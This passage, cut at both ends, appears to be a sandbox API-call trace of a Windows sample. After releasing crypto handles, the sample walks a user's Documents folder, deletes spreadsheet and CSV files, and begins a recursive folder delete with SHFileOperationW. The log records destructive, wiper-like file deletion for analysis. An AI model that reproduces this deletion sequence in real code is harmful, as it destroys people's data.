lpsz="bool") returned 0x4 [0216.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0216.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab758, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0216.104] CryptDestroyKey (hKey=0x9e1eb8) returned 1 [0216.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.104] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0216.104] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.104] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0216.104] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.104] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.104] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0216.104] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0216.105] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0216.105] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.105] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.105] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0216.105] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.105] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.105] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0216.105] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.105] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0216.105] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.105] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0216.105] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.105] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0216.105] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.105] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.106] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.106] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.106] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.106] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0216.106] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.106] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0216.106] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0216.106] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.106] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.106] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.106] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.106] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.106] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.106] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0216.106] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.106] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0216.106] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.106] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0216.106] CryptReleaseContext (hProv=0xa7bcd0, dwFlags=0x0) returned 1 [0216.106] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.106] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.107] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.107] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.107] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.107] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.107] FreeLibrary (hLibModule=0x76390000) returned 1 [0216.107] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.107] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.107] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.113] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.113] CloseHandle (hObject=0x504) returned 1 [0216.113] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.113] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.113] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0216.113] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0216.113] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Mpp4LjR5L7", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7", lpFilePart=0x8cedf4*="Mpp4LjR5L7") returned 0x24 [0216.113] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7" (normalized: "c:\\users\\fd1hvy\\documents\\mpp4ljr5l7")) returned 0x10 [0216.113] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc92a3740, ftCreationTime.dwHighDateTime=0x1d5cff2, ftLastAccessTime.dwLowDateTime=0x9529bd80, ftLastAccessTime.dwHighDateTime=0x1d5cc23, ftLastWriteTime.dwLowDateTime=0x9529bd80, ftLastWriteTime.dwHighDateTime=0x1d5cc23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e2138 [0216.113] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc92a3740, ftCreationTime.dwHighDateTime=0x1d5cff2, ftLastAccessTime.dwLowDateTime=0x9529bd80, ftLastAccessTime.dwHighDateTime=0x1d5cc23, ftLastWriteTime.dwLowDateTime=0x9529bd80, ftLastWriteTime.dwHighDateTime=0x1d5cc23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0216.113] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4ce120, ftCreationTime.dwHighDateTime=0x1d5ce55, ftLastAccessTime.dwLowDateTime=0x1244e270, ftLastAccessTime.dwHighDateTime=0x1d5d7e3, ftLastWriteTime.dwLowDateTime=0x1244e270, ftLastWriteTime.dwHighDateTime=0x1d5d7e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="bkBh5", cAlternateFileName="")) returned 1 [0216.114] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed55d0, ftCreationTime.dwHighDateTime=0x1d5d11c, ftLastAccessTime.dwLowDateTime=0x6c81a2d0, ftLastAccessTime.dwHighDateTime=0x1d5d3ee, ftLastWriteTime.dwLowDateTime=0x6c81a2d0, ftLastWriteTime.dwHighDateTime=0x1d5d3ee, nFileSizeHigh=0x0, nFileSizeLow=0x13dab, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="fVi 2i7ASSTMoS8P9w7L.xlsx", cAlternateFileName="FVI2I7~1.XLS")) returned 1 [0216.114] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\fVi 2i7ASSTMoS8P9w7L.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\mpp4ljr5l7\\fvi 2i7asstmos8p9w7l.xlsx")) returned 1 [0216.116] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55b088a0, ftCreationTime.dwHighDateTime=0x1d5c935, ftLastAccessTime.dwLowDateTime=0x284a7d00, ftLastAccessTime.dwHighDateTime=0x1d5d66c, ftLastWriteTime.dwLowDateTime=0x284a7d00, ftLastWriteTime.dwHighDateTime=0x1d5d66c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="J5_j1zUimxGe_9", cAlternateFileName="J5_J1Z~1")) returned 1 [0216.116] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44112fb0, ftCreationTime.dwHighDateTime=0x1d5d302, ftLastAccessTime.dwLowDateTime=0x997f50f0, ftLastAccessTime.dwHighDateTime=0x1d5caef, ftLastWriteTime.dwLowDateTime=0x997f50f0, ftLastWriteTime.dwHighDateTime=0x1d5caef, nFileSizeHigh=0x0, nFileSizeLow=0x11a80, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="vYbPg.csv", cAlternateFileName="")) returned 1 [0216.116] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\vYbPg.csv" (normalized: "c:\\users\\fd1hvy\\documents\\mpp4ljr5l7\\vybpg.csv")) returned 1 [0216.118] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44112fb0, ftCreationTime.dwHighDateTime=0x1d5d302, ftLastAccessTime.dwLowDateTime=0x997f50f0, ftLastAccessTime.dwHighDateTime=0x1d5caef, ftLastWriteTime.dwLowDateTime=0x997f50f0, ftLastWriteTime.dwHighDateTime=0x1d5caef, nFileSizeHigh=0x0, nFileSizeLow=0x11a80, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="vYbPg.csv", cAlternateFileName="")) returned 0 [0216.118] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0216.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854998 | out: hHeap=0x2af0000) returned 1 [0216.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0216.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0216.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0216.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0216.118] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0216.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0216.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0216.119] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0216.119] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0216.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38545d8 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0216.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0216.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eabe0 [0216.120] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Mpp4LjR5L7", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7", lpFilePart=0x8cf650*="Mpp4LjR5L7") returned 0x24 [0216.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0216.120] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7" (normalized: "c:\\users\\fd1hvy\\documents\\mpp4ljr5l7")) returned 0x10 [0216.121] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 